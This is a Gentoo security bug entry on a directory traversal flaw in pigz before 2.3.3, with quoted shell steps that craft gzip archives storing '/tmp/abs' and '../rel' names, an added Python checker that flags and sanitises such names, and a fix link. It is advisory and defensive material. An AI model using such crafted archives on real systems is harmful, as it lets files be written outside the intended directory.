Bug 536450 - <app-arch/pigz-2.3.3: directory traversal vulnerability
Summary: <app-arch/pigz-2.3.3: directory traversal vulnerability
Status: RESOLVED OBSOLETE
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: https://bugs.debian.org/cgi-bin/bugre...
Whiteboard: B4 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2015-01-13 08:43 UTC by Agostino Sarubbo
Modified: 2016-02-26 13:49 UTC

See Also:
Package list:
Runtime testing required: ---


Description Agostino Sarubbo gentoo-dev 2015-01-13 08:43:10 UTC
From ${URL} :

pigz is susceptible to directory traversal vulnerabilities. While
decompressing a file and restoring the stored file name, it (unlike gzip)
will happily use absolute and relative paths taken from the input. This
can be exploited by a malicious archive to write files outside the
current directory.

1. Absolute path.

A sample could be prepared in the following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ unpigz -N abs.gz

$ ls /tmp/abs
/tmp/abs

2. Relative path with "..".

A sample could be prepared in the following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory

$ unpigz -N rel.gz

$ ls ../rel
../rel
fix:
https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f


@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
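As an added illustration of the header field this report is about (example code written for this page, not part of pigz or of the Debian report), the script below reads the FNAME field of a gzip member the way an unpacker would before honouring -N, flags names that carry a path component, and reduces them to a basename as gzip does. The helper that constructs test members in memory and the "unnamed" fallback are assumptions of this example.

```python
import gzip
import posixpath
import struct
import zlib
from typing import Optional

GZIP_MAGIC = b"\x1f\x8b"
FEXTRA, FNAME = 0x04, 0x08  # FLG bits defined by RFC 1952

def build_member(name: bytes, payload: bytes = b"x\n") -> bytes:
    """Construct a gzip member whose FNAME field holds an arbitrary string.
    Test input only (constructed): Python's own gzip module applies
    os.path.basename() before writing FNAME, so it cannot emit a path here."""
    deflater = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw deflate
    body = deflater.compress(payload) + deflater.flush()
    header = GZIP_MAGIC + bytes([8, FNAME]) + struct.pack("<IBB", 0, 0, 3)
    trailer = struct.pack("<II", zlib.crc32(payload) & 0xFFFFFFFF, len(payload))
    return header + name + b"\x00" + body + trailer

def stored_name(data: bytes) -> Optional[bytes]:
    """Read the FNAME field of the first member without inflating anything."""
    if len(data) < 10 or data[:2] != GZIP_MAGIC or data[2] != 8:
        raise ValueError("not a gzip stream")
    flg, pos = data[3], 10
    if flg & FEXTRA:  # 2-byte little-endian length followed by the extra data
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if not flg & FNAME:
        return None
    return data[pos:data.index(b"\x00", pos)]

def is_unsafe(name: bytes) -> bool:
    """True if using the stored name verbatim (as pigz -N did) could place
    the output outside the current directory."""
    return not name or b"/" in name or name in (b".", b"..")

def safe_name(name: bytes, fallback: bytes = b"unnamed") -> bytes:
    """Keep only the final path component, which is how gzip treats FNAME.
    The fallback value is an assumption of this example, not gzip behaviour."""
    base = posixpath.basename(name)
    return base if base not in (b"", b".", b"..") else fallback

def inflate(data: bytes) -> bytes:
    """Confirm the constructed member is a valid gzip stream."""
    return gzip.decompress(data)

if __name__ == "__main__":
    for crafted in (b"/tmp/abs", b"../rel", b"report.txt"):
        member = build_member(crafted)
        print(stored_name(member), is_unsafe(crafted), safe_name(crafted))
```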
Comment 1 Aaron Bauman (RETIRED) gentoo-dev 2016-02-26 13:49:44 UTC
app-arch/pigz-2.3.3 in tree and stable.  No vulnerable versions in tree.  Fix link in previous comment.  GLSA Vote: No